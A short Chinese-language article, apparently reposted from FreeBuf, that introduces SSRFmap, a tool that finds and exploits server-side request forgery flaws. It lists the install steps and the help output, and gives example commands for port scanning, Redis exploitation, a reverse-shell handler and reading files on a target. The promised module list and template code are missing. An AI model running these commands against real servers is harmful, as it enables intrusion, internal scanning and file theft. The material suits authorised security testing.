SSRF，即服务器端请求伪造，很多网络犯罪分子都会利用SSRF来攻击或入侵网络服务。今天我们给大家介绍的这款工具名叫SSRFmap，它可以寻找并利用目标网络服务中的SSRF漏洞。

SSRFmap以Burp请求文件作为输入，研究人员可以利用参数选项来控制模糊测试的操作进程。

项目地址

SSRFmap：【GitHub传送门】

工具安装

大家可以直接从GitHub代码库中克隆该项目至本地：

git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
python3 ssrfmap.py
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l [HANDLER]]
                  [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
                  [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]

optional arguments:
  -h, --help          show this help message and exit
  -r REQFILE          SSRF Request file
  -p PARAM            SSRF Parameter to target
  -m MODULES          SSRF Modules to enable
  -l [HANDLER]        Start an handler for a reverse shell
  -v [VERBOSE]        Enable verbosity
  --lhost LHOST       LHOST reverse shell
  --lport LPORT       LPORT reverse shell
  --uagent USERAGENT  User Agent to use
  --ssl [SSL]         Use HTTPS without verification
  --level [LEVEL]     Level of test to perform (1-5, default: 1)

工具使用

SSRFmap的默认使用方法如下：

Examples:
    python ssrfmap.py -r data/request2.txt -p url -m portscan
    python ssrfmap.py -r data/request.txt -p url -m redis
    python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
    python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

大姐可以使用data/example.py来测试框架是否能够正常运行：

FLASK_APP=data/example.pyflask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles

功能模块

SSRFmap已整合了下列功能模块，大家可以使用-m参数来选择使用：

如果各位想针对特定服务添加自己的功能模块，可以参考下面这个模板代码：

原文地址：https://www.freebuf.com/sectool/197353.html